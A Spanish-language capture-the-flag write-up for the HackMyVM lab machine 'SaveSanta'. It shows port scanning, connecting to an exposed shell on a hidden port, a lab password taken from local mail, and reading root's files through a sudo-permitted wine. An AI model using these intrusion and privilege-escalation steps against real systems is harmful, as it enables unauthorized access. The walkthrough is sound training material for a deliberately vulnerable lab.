cd ~/blog

~/writeups/hmv/032-savesanta.md

032 - SaveSanta

easy Linux hmv 03-03-2024
Hidden service shell (unprotected port)Credential leak via local mailsudo wine file read Privesc
hackmyvm.eu/machines/machine.php?vm=SaveSanta

~1 min de lectura


Comenzamos con un escaneo de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.28
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.28
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-03 14:56 -03
Nmap scan report for 192.168.1.28
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu8.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 76:06:46:f1:83:85:a4:22:8c:2b:12:d4:2d:58:27:49 (ECDSA)
|_  256 76:54:26:9d:e8:4a:72:5e:6e:7f:68:58:20:6e:bb:d4 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: The Naughty Elves
| http-robots.txt: 3 disallowed entries
|_/ /administration/ /santa
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds

Enumeramos con gobuster:

 gobuster dir -u http://192.168.1.28/ -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt -r
...
/index.html           (Status: 200) [Size: 1012]
/media.html           (Status: 200) [Size: 1109]
/robots.txt           (Status: 200) [Size: 70]
/administration       (Status: 200) [Size: 1109]
/santa                (Status: 200) [Size: 1614]

Tras un rato de fuzzing, los directorios descubiertos empiezan a devolver 404. Volvemos a escanear con nmap y aparece un nuevo puerto abierto:

...
59285/tcp open  unknown
...

Nos conectamos con nc y resulta ser una shell directa del usuario alabaster:

 nc 192.168.1.28 59285
id
uid=1001(alabaster) gid=1001(alabaster) groups=1001(alabaster),100(users)
script /dev/null -c bash
Script started, output log file is '/dev/null'.
alabaster@santa:~$

Obtenemos la primera flag. En /var/mail hay un correo con las credenciales del usuario bill:

From santa@santa.hmv  Sun Mar  3 18:01:03 2024
Return-Path: <santa@santa.hmv>
Received: from santa.hmv (localhost [127.0.0.1])
	by santa.hmv (8.17.1.9/8.17.1.9/Debian-2) with ESMTP id 423I12hS001754
	for <alabaster@santa.hmv>; Sun, 3 Mar 2024 18:01:03 GMT
Received: (from santa@localhost)
	by santa.hmv (8.17.1.9/8.17.1.9/Submit) id 423I12m9001753;
	Sun, 3 Mar 2024 18:01:02 GMT
From: Santa Claus <santa@santa.hmv>
Message-Id: <202403031801.423I12m9001753@santa.hmv>
Subject: Important update about the hack
To: <alabaster@santa.hmv>
User-Agent: mail (GNU Mailutils 3.15)
Date: Sun,  3 Mar 2024 18:01:02 +0000

Dear Alabaster,

As you know our systems have been compromised. You have been assigned to restore all systems as soon as possible.

I heard you have kicked out the Naughty Elfs so they cannot come back into the system. To be more secure we have hired Bill Gates.

His account has been created and ready to logon. When Bill arrives, tell him his username is 'bill'. The password has been set to: 'JingleBellsPhishingSmellsHackersGoAway' He will know what to do next.

Please help Bill as much as possible so Christmas can go on!

- Santa

Iniciamos sesión como bill y revisamos sudo -l:

bill@santa:~$ sudo -l
Matching Defaults entries for bill on santa:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User bill may run the following commands on santa:
    (ALL) NOPASSWD: /usr/bin/wine

Podemos ejecutar wine como root. Aprovechamos que wine mapea el sistema de archivos en la unidad Z: para leer la flag de root:

bill@santa:~$ sudo wine cmd /c "type Z:\\root\\root.txt"

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados